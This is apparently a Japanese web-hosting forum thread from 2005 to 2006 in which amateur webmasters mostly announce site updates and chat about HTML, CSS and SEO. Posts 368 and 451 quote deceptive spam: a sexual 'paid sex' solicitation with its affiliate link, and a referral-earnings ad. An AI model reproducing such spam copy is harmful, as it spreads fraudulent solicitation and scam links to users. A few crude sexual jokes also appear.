0268Name_Not_Found
垢版 |
2005/04/17(日) 23:18:12ID:zXfdmT7/
半年振りに日記を数行書いたので遠路はるばるWeb制作まできてageに来ました!
0269Name_Not_Found
垢版 |
2005/04/19(火) 13:32:10ID:7zVKhYy+
gifアニ追加age
0270Name_Not_Found
垢版 |
2005/04/19(火) 13:34:29ID:???
先にageとけば今日やる気になるかな。
0272Name_Not_Found
垢版 |
2005/04/21(木) 18:56:51ID:kHTbfJFF
コラム更新
別館であぷー
0273Name_Not_Found
垢版 |
2005/04/21(木) 20:19:48ID:fs7+vXAI
久しぶりに更新&リニューアルage
0275Name_Not_Found
垢版 |
2005/04/21(木) 20:54:21ID:???
更新しますた。
ttp://www.yahoo.co.jp/
0277わむて
垢版 |
2005/04/24(日) 00:58:20ID:???

Webサイトの練習、というよりExcel(+マクロ)の練習かもしれないが
ノートパソコンの夏モデルが出揃ってきたので転売厨用メモを更新
http://www.geocities.jp/wamute_mirumaraaaaaa/example/note/index.html

次は
http://www.geocities.jp/wamute_mirumaraaaaaa/example/note/index2.html
の全く役に立たない検索を
メーカーを問わず(全メーカーから)一気に検索できるよう、スクリプトを修正する予定

私的メモ用に作っているのを和塩に載せただけなので画像が表示されないのは仕様
もし載せたら著作権違反とかになる?

スクリプト練習とかExcelも少しくらいは弄ってみようということが目的なので
データは結構いいかげん
0278わむて
垢版 |
2005/04/24(日) 01:01:44ID:???

これからもわむてを応援してくださいね〜
みるまらっっ!!!
 ̄ ̄∨ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,‐ ' ´  ヽ
/ i lレノ)))
 / 人il.゚ ヮノ
   ⊂)Yib    /⌒)
    く|: _フつ/@ニ)'
     ∪ / ,/
    ._/@二)
    `ー―'"
0280Name_Not_Found
垢版 |
2005/05/07(土) 10:32:26ID:xJc250Rx
私のHPが神リンク集だけでは無い事を教えてやる。














……本格的な更新は明日以降になるけどね
写真氏ぬ程溜まってるから

0281Name_Not_Found
垢版 |
2005/05/07(土) 10:52:14ID:eWHDWAmk
http://YahooBB219025044006.bbtec.net/
っwwwwwwうぇwwww
wwwwwwおkwww
wwwwwwwwwwwwっうぇwwwwwwwwww
っうぇうはっwwwおkwwwっっ
っうぇっうぇ
0283Name_Not_Found
垢版 |
2005/05/07(土) 12:42:36ID:XxOpsuhA
http://zaq3d7391e9.zaq.ne.jp/
っうぇっうぇっおkwwwwwwwwwwwwwwwwww
wwwおkwwwおkwwwっうぇwwwwうはっwww
っうぇwwwwwwwwwwwwwwwwww
0284Name_Not_Found
垢版 |
2005/05/12(木) 10:15:19ID:kOKWt66h
更新あげ

web小説ってどこで宣伝すればいいんだろ
0287Name_Not_Found
垢版 |
2005/05/13(金) 10:39:17ID:jJ/o/2Pl
更新したよ。
0288Name_Not_Found
垢版 |
2005/05/13(金) 15:41:21ID:giupjggd
更新age
0289Name_Not_Found
垢版 |
2005/05/13(金) 17:15:55ID:waszA8lO
更新したどー。

17:14現在、全世界で13人しかプレイしてないゲームのサイトだどー。
でも好きだから……いいよな。
0291Name_Not_Found
垢版 |
2005/05/14(土) 00:36:39ID:O2tJ2iVk
週に一度の更新終了。
最近写真のネタがない…。
0292Name_Not_Found
垢版 |
2005/05/14(土) 20:38:07ID:y8gMidJh
更新age


誰もこないけど・・・・orz
0293Name_Not_Found
垢版 |
2005/05/14(土) 21:36:56ID:hTXo7xWM
更新しようと思ったら、鯖が落ちてる!!
ちくしょう!!!!(゚Д゚)ゴルァ!!
0294Name_Not_Found
垢版 |
2005/05/15(日) 00:56:34ID:efm6bQYB
http://studionadia.myfws.com/
開設二日目だけど、毎日更新なのでもぅ挫けそうorz
更新age
0296Name_Not_Found
垢版 |
2005/05/15(日) 22:53:35ID:dfrezwB8
>>294
自分が楽しめないサイトは、作るべきじゃないと思う。(仕事でも無い限り)
ニュースサイトなんて、特にライバル多いし。プレッシャー凄そうだし。
0297Name_Not_Found
垢版 |
2005/05/15(日) 22:55:28ID:???
あと、アフィリエイトは毎日2万アクセス以上になってからの方が良いと思うよ。
欲の権化みたいに見られるし、見栄え悪いし、そもそも利益ならんし。
0298Name_Not_Found
垢版 |
2005/05/16(月) 09:01:22ID:???
開設二日目で毎日更新がつらいって二日しか更新してないやん。
つらいならやめれば?
0299Name_Not_Found
垢版 |
2005/05/16(月) 17:16:42ID:lfU5U5vc
あまりに鯖ダウンが激しいので移転。
ついでにTOP画像変更したので age
0300Name_Not_Found
垢版 |
2005/05/18(水) 01:49:44ID:GkrLGI3E
約1年2ヶ月ぶりの更新。
0301Name_Not_Found
垢版 |
2005/05/19(木) 11:44:32ID:4Y0HX7wy
なんというか、更新したのでAge
0302Name_Not_Found
垢版 |
2005/05/19(木) 12:15:46ID:???
>>294
ガンガレ。85番踏んどいたよ。
またいくわ。
0303Name_Not_Found
垢版 |
2005/05/19(木) 15:33:00ID:???
今日サイト開設しました
あげまくりんぐ
0304Name_Not_Found
垢版 |
2005/05/22(日) 06:12:04ID:3nQQhRFk
まだまだ写真あるどー。取り敢えず載せといたけど
最近撮った分に追いつくまでやっつけ仕事ですので宜しく
0306Name_Not_Found
垢版 |
2005/05/22(日) 12:09:25ID:zctvZjQI
更新age
0308Name_Not_Found
垢版 |
2005/05/24(火) 13:01:09ID:UT54YcO+
>>304
お前は俺か?

普段の4倍くらいのペースで更新しましたヽ(○´ω`○)ノ
0309Name_Not_Found
垢版 |
2005/05/26(木) 22:25:51ID:???
更新します他
裏だから履歴には書かんが
0310Name_Not_Found
垢版 |
2005/05/29(日) 14:33:48ID:???
更新したらageようにゃ
一週間ぶりに更新
日記サイトなのに
0311Name_Not_Found
垢版 |
2005/05/31(火) 09:35:48ID:o0fb8Umx
リニュage
0312Name_Not_Found
垢版 |
2005/05/31(火) 17:02:17ID:ExTaD3z8
ttp://members.goo.ne.jp/home/meryloran827000/main
はじめまして〜!みっぴぃと言います。
ホームページ作りました!
俺もまだわからないことおおいけど、お願いします!
 自己紹介すると高3の17歳男子です。
部活はサッカーしてます。趣味は映画鑑賞(レンタルダケドプププッ (*^m^)o==3)とか〜詩をよむことそれに恋バナ聞くこと絡むこと
メールするのも好きかな!好きな歌手は〜大塚愛、中島美嘉、あいこです。男性歌手ゎ〜ポルノトカレンジ、NEWS、W-indsが好きだな〜あと〜ポルノは昭仁、レンジはヤマト,W-indsは慶太かな〜
ジャニーズ系はどれも好きかな!男の俺でもカッコイイシ!!今KAT-TUNの仁クンがめちゃ憧れ〜!anego見てますよ〜
アニメは今ナルトとハガレンがお気に入り!
同じ好みの方、俺と絡みたい人、恋バナしたい人、相談のある人
ぜひお友達になりましょう!一度HPに遊びにきてね!
何か書いてくれたら嬉しいかも〜☆(コピペしてますスイマセン!
@(;・ェ・)@/反省…)σ(^_^;)アセアセ
ttp://choco2.jp/profB.php?id=meryloran827000&pg=2&pn=1
ここで僕のプロフィールと写真が見れます!!
0315Name_Not_Found
垢版 |
2005/06/01(水) 01:26:53ID:q2rl2G8e
サイトに格納忘れてた過去の作品upage
0317Name_Not_Found
垢版 |
2005/06/02(木) 00:19:51ID:8LO07s2P
数ヶ月ぶりに更新!
小説書いてみたけど才能ないなぁ・・・
0318Name_Not_Found
垢版 |
2005/06/02(木) 02:25:53ID:OTLX/+27
更新した。
毎月作ってるデスクトップ・カレンダー、
気がついたら、もう2年以上続いてた。
我ながら、よーやるわ。
0319Name_Not_Found
垢版 |
2005/06/04(土) 17:26:45ID:ZF2S7vfv
わーい、久々に更新したー☆
0320Name_Not_Found
垢版 |
2005/06/07(火) 03:14:39ID:YUgmy5VI
独自ドメイン申し込んだ。
明日3年分の料金を振り込む。
0322Name_Not_Found
垢版 |
2005/06/07(火) 15:50:43ID:ebvJBTB3
更新完了age
0323Name_Not_Found
垢版 |
2005/06/07(火) 18:14:13ID:3oPi05zy
更新完了。
0324Name_Not_Found
垢版 |
2005/06/07(火) 18:14:38ID:77BfQjZB
『宙秤須霊殺闘』

 長い伝統と歴史をもつ中国拳法史上にあっても唯一度だけおこなわれたという史
上最凶の戦い。明朝末期の千六百十五年二月二十九日、場所は格闘技の聖地と
いわれた雲南省青牙山山頂火口・・・。当時雲南地方で勢力を二分し抗争に明け暮
れていた北濡流拳と南我拳の戦いに終止符を打つべく時の皇帝の命により双方お
よそ三百人からの全弟子を天秤にかけ、両派最高師範がその存亡をかけて戦った
という。勝負は北濡流拳の勝利に終わり敗れた南我拳は全滅し拳法史上から姿を
消した。戦いに勝利した北濡流拳の最高師範は後に神格化され、民衆の信仰を集
めたとされる。現代においては、日々2chでの『ぬるぽ』対『ガッ』の死闘が繰り広げ
られているが、これはこの戦いに由来する。

民明書房刊『拳法興亡史より』
0325Name_Not_Found
垢版 |
2005/06/08(水) 12:46:31ID:EFaPdmMR
              ヽ从/ 。
       ガバッ!   ∧,,∧    
             (゚Д゚;):. _ 
            r'⌒と、j ミ ヽ 
           ノ ,.ィ'  `ヽ. /
          /       i!./
           (_,.         //
          く.,_`^''ー-、_,,..ノ/
            `~`''ー--‐'
0326Name_Not_Found
垢版 |
2005/06/08(水) 13:03:06ID:w9vlSmzO
更新したよ。このくそたれが。
http://otoku.cheap.jp/

  , v、ヘM 'リ"ノンミ/ソMv、
   ソVvミヘ/Wv彡vV/ ミ∠ミ::
  ミミ         _   ミ:::
  ミ    二__, --、r'"___、 ヾ ト、::ヽ
  ミレ'"~,-,、 !  ! ' '" ̄ .ノ \ヾ:、
  K/ー'~^~_/  ヽミ:ー‐‐'"   ヽ i.
 !〉 ー―'"( o ⊂! ' ヽ       Y_     
 i     ,.:::二二ニ:::.、.       l i     
 .!     :r'エ┴┴'ーダ       !Kl     
 .i、  .   ヾ=、__./        ト=     
  ヽ. :、   ゙ -―-    ,;    ,! 
  \.  :.         .:    ノ
   ヽ  ヽ.       .    .イ
.    `i、  、::..     ...:::ノ ,∧
0327Name_Not_Found
垢版 |
2005/06/10(金) 23:44:31ID:/uQ+zAUU
新作うpage
0328Name_Not_Found
垢版 |
2005/06/13(月) 01:29:17ID:ULoqNWmI
更新age
0329Name_Not_Found
垢版 |
2005/06/15(水) 19:17:06ID:XY0jmns1
しばらくPC壊れてたのがよーやく直った。
更新age。


今まで全然人来なかったのに壊れてる間だけ人がきてた…うへへ…orz
ナンデヤネン。
0330Name_Not_Found
垢版 |
2005/06/15(水) 21:55:36ID:C5VVU8yS
じんわりまったり20日ぶりの新作更新age
ま、いいか、前の絵は1ヶ月半かかったし。
もっと早い手がほしい…orz
0331Name_Not_Found
垢版 |
2005/06/15(水) 22:32:46ID:lVM4854Z
一ヶ月ぶり更新〜age!
0333Name_Not_Found
垢版 |
2005/06/18(土) 23:32:59ID:jYf+g8YN
更新age
0334Name_Not_Found
垢版 |
2005/06/19(日) 15:55:19ID:FjzERw7b
友達に教えるダミーサイトを作ったよ
0335Name_Not_Found
垢版 |
2005/06/20(月) 06:13:01ID:8s4kPuWs
初めてまともな更新した。
0336Name_Not_Found
垢版 |
2005/06/20(月) 16:15:41ID:2KRFliC3
最近毎日更新してるぞ上げ!
人がきてくれると嬉しくてついやっちまう
…でもさすがにちょっと息切れしてきたかも

よし、ちょっと休む!
0337Name_Not_Found
垢版 |
2005/06/23(木) 04:26:51ID:???
xoops入れてみたけど、掲示板(フォーラム)が見づらくてマイッタの一言。
0338Name_Not_Found
垢版 |
2005/06/23(木) 22:52:03ID:LSbTjMJz
更新ー。
友人が来た。。。
でも結構好評なので放置
0342Name_Not_Found
垢版 |
2005/07/04(月) 19:07:10ID:0QFHj+0w
久しぶりに時間かけたまともな作品更新age
0343Name_Not_Found
垢版 |
2005/07/06(水) 00:41:06ID:38WJAc3c
3年程テキストサイトやってきたんだけど
ついに面倒くさくなってムーバブルタイプ導入した
恐ろしく楽になった
0344Name_Not_Found
垢版 |
2005/07/06(水) 01:35:00ID:???
あれって、サーバーたてないと導入できないの?
0345Name_Not_Found
垢版 |
2005/07/09(土) 01:48:44ID:b34qEt4l
更新したよん
0346Name_Not_Found
垢版 |
2005/07/17(日) 23:20:34ID:hWj5fSFr
ひっそりとトップを夏休み仕様に変更。
良いんだ。
夏休みどころか盆休みもない職種だけど、気分だけでも味わいたいんだ。
0347Name_Not_Found
垢版 |
2005/07/18(月) 11:29:32ID:8+MpxSQg
サイトを全体的にやる気ある感じに改装。
がんばるぞっと
0348Name_Not_Found
垢版 |
2005/07/18(月) 20:52:43ID:INhTELOP
ライブレポできましたよっと
0349Name_Not_Found
垢版 |
2005/07/19(火) 14:12:48ID:hWNg/r2Z
もうね、毎日毎日更新してますよ!
そこ!暇人って言わない!
0351Name_Not_Found
垢版 |
2005/07/21(木) 21:02:49ID:GZFPT+WE
今日から開設( ´∀`)
0352Name_Not_Found
垢版 |
2005/07/24(日) 04:02:49ID:ZdIhP+0q
>>351
開設おめ

更新あげ
0353Name_Not_Found
垢版 |
2005/07/24(日) 12:37:56ID:ehYq4e5F
ひさびさにがんばった。
0354age
垢版 |
2005/07/24(日) 16:36:25ID:ashRiqV1
>>351
開設おめー

ハーボット餓死する寸前…
0355Name_Not_Found
垢版 |
2005/07/24(日) 16:44:41ID:lU4WQhYt
地震でパソコン壊れたのでしばらく更新停止します
と無理矢理ネカフェからソースいじって更新しました。
バックアップとってなかったからリカバリから返ったらまた作り直しだ…orz
0356りょうた
垢版 |
2005/07/24(日) 18:43:56ID:5jsCPXfZ
ゲー音更新しますた
0357Name_Not_Found
垢版 |
2005/07/24(日) 23:36:15ID:???
>>355
更新停止しますとアップするときに
現在アップされてるデータを落とせばいいだろうに
0360Name_Not_Found
垢版 |
2005/08/07(日) 20:21:25ID:0zL39OI4
地味に更新してます
0362Name_Not_Found
垢版 |
2005/08/07(日) 22:24:21ID:zSKydU91
地味に下げちゃった

いつか、うちのサイトに来てね
0363Name_Not_Found
垢版 |
2005/08/08(月) 04:10:39ID:22LAMss8
こうし〜ん
0365Name_Not_Found
垢版 |
2005/08/12(金) 04:05:35ID:2iZ9fydo
サーバー移転
0367グローバルメディアオンライン関連スパム
垢版 |
2005/08/12(金) 12:37:35ID:QCFst8FK
http://pc7.2ch.net/test/read.cgi/antispam/1118652293/
グローバルメディアオンライン関連スパム

最近やたらと届くスパムメールにある誘導サイトのドメインはhosting-geomax.jp。
このドメイン保持者をwhois検索(http://whois.ansi.co.jp/)したところグローバルメディアオンラインが管理していることが判明。
このグローバルメディアオンラインは勝手に登録され迷惑なメーリングリストサイトFreeMLの管理会社。
またロリポップなどのレンタルサーバ会社としても有名。最近ロリポップは今更ながらスパムメールを受信しない機能をつけたが自分の会社でスパムメールをばらまきながら一方でスパム対策しているという状況。
スパイウェアJWORDも関係しているし最悪な会社。
0368スパムの温床:muumuu-domain
垢版 |
2005/08/12(金) 12:38:14ID:QCFst8FK
http://pc7.2ch.net/test/read.cgi/antispam/1118652293/
スパムの温床:muumuu-domain

http://www.mymadonna.jp/user.app?asp=pc253

お礼はします。SEXをしてください!
男→女ならあっても、女→男ではこのパターンはありえない、と思っているあなた、それは間違いです。
冷静に考えてみてください。
女性でもSEXしたくてもできない人は多いのです。
いろいろな事情があります。
たとえば・・
・現在24歳で、実はまだ「処女」。付き合っている人もいるがさすがにこの歳で処女は相手に引かれちゃうんじゃないかと思っている。1回だけ、膜を破ってくれるだけの男性を探している。
・ソープ嬢をやっているが、日ごろ相手しているのがセレブなジジィばかりでいいかげんいやになっている。時々若い男の太いものをつっこんでもらいたいが、商売柄なかなか彼氏を作ることができない・・・。
・28歳で会社経営をしている。早くして起業したので周りの人間が仕事関係メインになっている。そんな環境で彼氏を作ろうものなら、即、仕事に影響が出る。日々の仕事に関係ない彼氏など作っているひまもない。
などなど。

http://www.mymadonna.jp/user.app?asp=pc253

ぶさいくだから男がしてくれない!ということよりも、SEXするのにお礼を出してもいい!という女性は、おかれている状況でSEXから遠ざかっている、といったほうが多いようです。
もし、こういった女性のお相手が苦でないようでしたら、一度サイトまでお越しください。
ただし!SEXは好きじゃないとだめですよ?
かなり欲求不満な女性たちですから、一晩に1回・2回程度では終わらないものと思っていてください・・・(私も何度かお相手させていただいた結果の統計です(^_^;;
その代わり、日ごろ出来ない、いろんなプレイを強要することは全然OKです(^o^)。すき放題にいたぶってあげてください。

http://www.mymadonna.jp/user.app?asp=pc253
0369スパムの温床:muumuu-domain
垢版 |
2005/08/12(金) 12:39:23ID:QCFst8FK
NTTPC(InfoSphere)あたりの回線を使って執拗に送ってきやがる。
タイトルだって
> やっとだよ
とか
> あなたはいくらですか?
てな感じで未承諾広告なんて全然お構い無し。

mymadonna.jp
をドメインサーチすると、

[名前] 株式会社 paperboy&co.
[Email] admin@muumuu-domain.com

と出てきた。ゴルァするも受理されない。
他のアドレスに送ってもまるで対応無し。
0370Name_Not_Found
垢版 |
2005/08/12(金) 15:17:01ID:KQ/h3ehS
リニュage

どうでもいいけど、いつもリニュをニリュって書いてしまう。
0371Name_Not_Found
垢版 |
2005/08/13(土) 03:49:32ID:EIhWt62m
更新
0372Name_Not_Found
垢版 |
2005/08/15(月) 01:11:26ID:uMj3EIES
更新age
0373Name_Not_Found
垢版 |
2005/08/16(火) 01:02:41ID:???
(´・ω・)HTML・・・奥が深ス
ていうか分かんなス
0374Name_Not_Found
垢版 |
2005/08/17(水) 20:47:56ID:/CX+9Twz
こうし〜ん
0375Name_Not_Found
垢版 |
2005/08/17(水) 21:20:41ID:R5QWputz
ゴミタグだらけ。orz
0378Name_Not_Found
垢版 |
2005/08/24(水) 20:42:17ID:dYP/wLQR
更新アゲー。
0382Name_Not_Found
垢版 |
2005/08/30(火) 20:59:59ID:aWZBalHo
更新シタ━━(゚∀゚)━━!!!
0383Name_Not_Found
垢版 |
2005/09/18(日) 23:30:54ID:f4bGWsbW
俺も更新した。
市川由衣で一発抜いて寝よう。
0385Name_Not_Found
垢版 |
2005/09/19(月) 01:23:44ID:vVN64YtG
・゚・(ノД`;)・゚・ 閉鎖を知らせるための更新をしてきました
0387Name_Not_Found
垢版 |
2005/09/19(月) 09:55:02ID:hX/w/chI
更新ダァァァ

ヒトコネ
0388Name_Not_Found
垢版 |
2005/09/26(月) 00:43:43ID:???
Yahoo!ディレクトリがなくなると聞いてあわててSEO対策の更新です。。。
0390Name_Not_Found
垢版 |
2005/10/30(日) 00:49:04ID:W4W3c76p
素材サイト更新あげ

シャケをアイコンにする香具師なんて自分くらいなもんだな
0391Name_Not_Found
垢版 |
2005/10/30(日) 01:34:59ID:???
googleできちんと検索してくれなくて、metaタグだけ更新。
文法ミスってなきゃ気がついてくれるよな・・・
0393Name_Not_Found
垢版 |
2005/11/11(金) 19:45:23ID:???
ようやくテンプレートHTMLが出来たよー、、
超時間かかった。しかし超大作。珍しく自信ある。
完成したらageにくるぜ!
0394Name_Not_Found
垢版 |
2005/11/15(火) 21:34:19ID:9QSCjmtj
きょうからあげ
0397Name_Not_Found
垢版 |
2005/11/17(木) 19:26:27ID:QiBDnDVO
こうしんあげ
0398Name_Not_Found
垢版 |
2005/11/17(木) 23:23:23ID:QFpDVUgV
うー、更新age

まだまだアラがあるなぁ
0400Name_Not_Found
垢版 |
2005/11/18(金) 20:30:02ID:Os2UBGyL
こうしんあげ
0401Name_Not_Found
垢版 |
2005/11/19(土) 20:52:38ID:TZvpM6vp
こうしんあげ
0402Name_Not_Found
垢版 |
2005/11/20(日) 02:37:46ID:SCZ3e1dj
更新したべ
0403Name_Not_Found
垢版 |
2005/11/20(日) 19:44:20ID:Y8mCHTrc
こうしんあげ
0404Name_Not_Found
垢版 |
2005/11/21(月) 19:29:11ID:aMk7yCWk
こうしんあげ
0405Name_Not_Found
垢版 |
2005/11/21(月) 19:48:36ID:43pnlGXj
>>404
あらゆるリンクを辿って、404NotFoundになってないか要チェックだ!
0406Name_Not_Found
垢版 |
2005/11/21(月) 20:19:13ID:lpEyJZid
こうしんあげ
0408Name_Not_Found
垢版 |
2005/11/22(火) 23:45:23ID:???
最終更新日の所にjava使って今日の日付だしておいた。
0409Name_Not_Found
垢版 |
2005/11/23(水) 22:15:46ID:lMq4c6G6
こうしんあげ
0411Name_Not_Found
垢版 |
2005/11/24(木) 19:28:54ID:ztLxT/H8
こうしんあげ
0412Name_Not_Found
垢版 |
2005/11/24(木) 23:59:35ID:a46Lacxy
ここ2、3日、自サイト(レンタルサーバ)が異様に重くなることがあった。
ログを確認してみるとkrからアクセスが1件あったのでもしやと思い中韓フィルタをセット。
今日は全く重くならない!

ログには他の中韓からのアクセス跡は残っていなかったけど変なパケットでも飛んできていたのかね〜
0413Name_Not_Found
垢版 |
2005/11/25(金) 19:53:11ID:bpGaCgsA
こうしんあげ
0414Name_Not_Found
垢版 |
2005/11/26(土) 18:57:56ID:auY91cQV
こうしんあげ
0415Name_Not_Found
垢版 |
2005/11/26(土) 21:53:14ID:XrRwkQ4D
こうしんあげ
0416Name_Not_Found
垢版 |
2005/11/27(日) 19:08:14ID:j/iINGC9
こうしんあげ
0417Name_Not_Found
垢版 |
2005/11/27(日) 20:06:06ID:a62KxdZS
更新したよ
0418Name_Not_Found
垢版 |
2005/11/27(日) 21:12:51ID:Y0BbMt8c
全面リニューアルあげ
0419Name_Not_Found
垢版 |
2005/11/28(月) 19:09:49ID:xxjnoxbD
こうしんあげ
0420Name_Not_Found
垢版 |
2005/11/28(月) 23:15:29ID:o8HePhzf
最新あげ
0421Name_Not_Found
垢版 |
2005/11/29(火) 17:58:43ID:Z6bOrC+K
こうしんあげ
0422Name_Not_Found
垢版 |
2005/11/29(火) 23:39:51ID:jSpeI/00
更新あげま〜す
0423Name_Not_Found
垢版 |
2005/11/30(水) 19:27:58ID:/GMAeGi9
こうしあげ
0425Name_Not_Found
垢版 |
2005/12/01(木) 18:24:03ID:c9kZ11W4
こうしんあげ
0426Name_Not_Found
垢版 |
2005/12/01(木) 20:17:38ID:???
ひゅーれっと・ぱっかーどの社員の集うスレはここですか?
0427Name_Not_Found
垢版 |
2005/12/01(木) 20:35:25ID:QD/hlkfd
ココはPHP出版関係者のスレです。
0428Name_Not_Found
垢版 |
2005/12/02(金) 01:07:33ID:???
ここはHPを回復させる宿屋です。
0430Name_Not_Found
垢版 |
2005/12/04(日) 18:18:45ID:jYYQ71BQ
こうしんあげ
0432Name_Not_Found
垢版 |
2005/12/05(月) 19:43:55ID:h3W+5zOI
こうしんあげ
0433Name_Not_Found
垢版 |
2005/12/05(月) 21:55:37ID:Bq9GCH9r
更新したよ〜
だれかRubyスクリプト使っておくれYO!
0434Name_Not_Found
垢版 |
2005/12/06(火) 20:19:38ID:eULxqc01
こうしんあげ
0435Name_Not_Found
垢版 |
2005/12/07(水) 15:56:56ID:MLNsr0Pc
朝の4時まで頑張った。
久しぶりに更新したよ、何ページも。


でも昨日は7人しか来てないけどね。今日はまだ2人…
0436Name_Not_Found
垢版 |
2005/12/07(水) 19:58:01ID:tfvji1fj
こうしんあげ
0437Name_Not_Found
垢版 |
2005/12/08(木) 19:06:13ID:YCReBksT
こうしんあげ
0438Name_Not_Found
垢版 |
2005/12/09(金) 19:44:30ID:HnzqtqyW
こうしんあげ
0439Name_Not_Found
垢版 |
2005/12/09(金) 22:15:40ID:EL1/lnza
こうしんあげ
0440Name_Not_Found
垢版 |
2005/12/10(土) 21:35:52ID:GZ0Wom9q
こうしんあげ
0441Name_Not_Found
垢版 |
2005/12/11(日) 02:19:22ID:SF6hzzLb
更新しすぎて死にそうだ
0442Name_Not_Found
垢版 |
2005/12/11(日) 03:41:04ID:+ngSRXax
気合入りまくりのこうしんあげ
宣伝しまくったんで明日は100ホトいくかもー
0443Name_Not_Found
垢版 |
2005/12/11(日) 18:20:54ID:ApSncgUd
こうしんあげ
0444Name_Not_Found
垢版 |
2005/12/12(月) 18:12:44ID:eA4v6mhp
こうしんあげ
0445Name_Not_Found
垢版 |
2005/12/13(火) 01:17:56ID:BqZlcduY
人民元のページ更新したお
0446Name_Not_Found
垢版 |
2005/12/13(火) 17:55:37ID:aX7Fw1cj
こうしんあげ
0447Name_Not_Found
垢版 |
2005/12/14(水) 20:46:12ID:oxMpOAmi
こうしんあげ
0448Name_Not_Found
垢版 |
2005/12/15(木) 19:34:37ID:nRSWUsLr
こうしんあげ
0449Name_Not_Found
垢版 |
2005/12/15(木) 20:21:48ID:ScPfzXMB
誤字を一文字だけ修正揚げ
0450Name_Not_Found
垢版 |
2005/12/16(金) 18:33:16ID:zpI6xGWW
こうしんあげ
0451  
垢版 |
2005/12/16(金) 21:16:11ID:chZQr3kE
稼ぎサイトの中でポケパケ+の紹介制度はホムペにリンク貼ったりすれば結構期待できる。最近できたサイトだから早めに動けば結構稼げるかも。http://www.pocketpacket.jp/in/?cid=intro&icode=769831
0452Name_Not_Found
垢版 |
2005/12/16(金) 23:52:23ID:tN9bJHvE
こうしんあげ
0453Name_Not_Found
垢版 |
2005/12/17(土) 20:36:57ID:qyLt4pXa
こうしんあげ
0454Name_Not_Found
垢版 |
2005/12/18(日) 03:18:12ID:RQU3rJMp
こうしんあげ
0455Name_Not_Found
垢版 |
2005/12/18(日) 19:36:34ID:LB6jYSgl
こうしんあげ
0456Name_Not_Found
垢版 |
2005/12/19(月) 19:15:33ID:HEm7nsi/
こうしんあげ
0457Name_Not_Found
垢版 |
2005/12/20(火) 21:37:12ID:3ltdwT2x
こうしんあげ
0458Name_Not_Found
垢版 |
2005/12/21(水) 20:18:33ID:x9WEjiIS
こうしんあげ
0459Name_Not_Found
垢版 |
2005/12/21(水) 22:44:50ID:3jQc+cni
html4.01からxhtml1.1に全て書き換え
CSSも全面的に書き直した
更新age
0460Name_Not_Found
垢版 |
2005/12/22(木) 20:13:59ID:a9qjSbp7
更新アゲ
>>459
いいことあった?
0461Name_Not_Found
垢版 |
2005/12/22(木) 21:25:31ID:???
>>460
今まで部分的にしかCSSを使ってなかったし、外部呼出しじゃなかったから
サイト全体のスタイルの統一に時間がかかるのでデザインがダサダサだった。

CSSを外部呼出しにして全ページ一気にデザインが変えられるようになって、
かなり感動した。今はまだデザインはシンプル…というかほとんど無いに近いけど、
更新が楽になったし、色々勉強して結構自由にいじくれるようになったから楽しみ。

でも1ホッターだから所詮自己満足でマズー。これからはSEO対策を勉強するべきかも。
更新してないのでsage
0462Name_Not_Found
垢版 |
2005/12/23(金) 20:32:55ID:M9F8985/
こうしんあげ
0463Name_Not_Found
垢版 |
2005/12/24(土) 12:15:53ID:xvO0OjD4
今日は今から明日まで更新し続けるこうしんあげ
0464Name_Not_Found
垢版 |
2005/12/25(日) 14:38:14ID:X2DLzOVy
勃起しながら更新あげ
ボッキアゲ!
0465Name_Not_Found
垢版 |
2005/12/27(火) 21:35:06ID:+OKvhFlm
コソコソ更新age
0466Name_Not_Found
垢版 |
2005/12/28(水) 01:07:29ID:OybDJ+zk
更新しました
0467Name_Not_Found
垢版 |
2005/12/28(水) 19:19:29ID:7uw+Hg3c
こうしんあげ
0468Name_Not_Found
垢版 |
2005/12/31(土) 22:12:12ID:gYc59aAi
こうしんあげ
0469Name_Not_Found
垢版 |
2006/01/02(月) 03:06:48ID:VpEA4UEA
こうしんあげ
ヒマなやつは正月休みの更新頻度高そうだなぁ。。
俺の事だが、、
0470Name_Not_Found
垢版 |
2006/01/31(火) 16:44:36ID:???
1ヶ月もの間誰も更新しなかったらしい
0471Name_Not_Found
垢版 |
2006/02/04(土) 23:54:54ID:pKYkdPNF
7時間かけて合計422ページ更新した気持悪い俺ガイル
0472Name_Not_Found
垢版 |
2006/02/05(日) 00:09:05ID:1vFhyM8m
更新してたのにあげてなかった。
まとめてageageageage・・・
0473Name_Not_Found
垢版 |
2006/02/05(日) 02:39:24ID:???
唖然・・・

自分にはそれほどの気力はないな。
根気が無いだけか。

乙です。
0474Name_Not_Found
垢版 |
2006/02/06(月) 23:19:35ID:2B54w1Hc
更新したからage
0475Name_Not_Found
垢版 |
2006/02/20(月) 00:41:15ID:1OBneA1E
AGE
0476Name_Not_Found
垢版 |
2006/02/20(月) 14:00:54ID:/KBthZRL
更新しました
0477Name_Not_Found
垢版 |
2006/02/22(水) 00:51:14ID:qyGFwEmJ
更新
0478Name_Not_Found
垢版 |
2006/02/25(土) 11:44:49ID:vC5w7Iuh
更新あげ。
0480Name_Not_Found
垢版 |
2006/02/28(火) 14:24:21ID:A+6Ek8LJ
あげと言いつつさげちまった;
0481Name_Not_Found
垢版 |
2006/02/28(火) 15:44:34ID:Qx8eh7kj
上げん
0482Name_Not_Found
垢版 |
2006/03/02(木) 04:22:35ID:mf2BpMV8
更新あげー!
0483Name_Not_Found
垢版 |
2006/03/02(木) 14:03:19ID:KTy+2QKU
HP初うp更新あげ
タイトル忘れたけどまだねらーにはばれてないようだ
0484Name_Not_Found
垢版 |
2006/03/05(日) 14:58:49ID:Rko9yz/W
おや、週末なのに更新なかったんか。
一応あげ。
0485Name_Not_Found
垢版 |
2006/03/05(日) 18:52:05ID:eTIIl0wq
ソフトウェアの要望いろいろ実装してうpした。疲れた〜

更新age
0486Name_Not_Found
垢版 |
2006/03/32(土) 20:55:53ID:K0I6ofvO
エイプリルフールあげ
0487Name_Not_Found
垢版 |
2006/06/21(水) 10:18:31ID:7z52gewh
↑age
0488Name_Not_Found
垢版 |
2006/08/18(金) 22:36:19ID:Wcd0a/Sl
今日童貞ホテルで彼女と捨てました。
そしてサイト更新age
0493Name_Not_Found
垢版 |
2006/08/26(土) 14:24:20ID:MDqGt2g+
素材うpage
0495Name_Not_Found
垢版 |
2006/08/27(日) 20:52:04ID:KfWO8ZtG
数ヶ月ぶりにトップページを更新した
0496Name_Not_Found
垢版 |
2006/08/27(日) 21:20:28ID:???
なんか祭りになってるっぽい

関西圏のWEB制作会社2
http://pc8.2ch.net/test/read.cgi/hp/1144192292/351



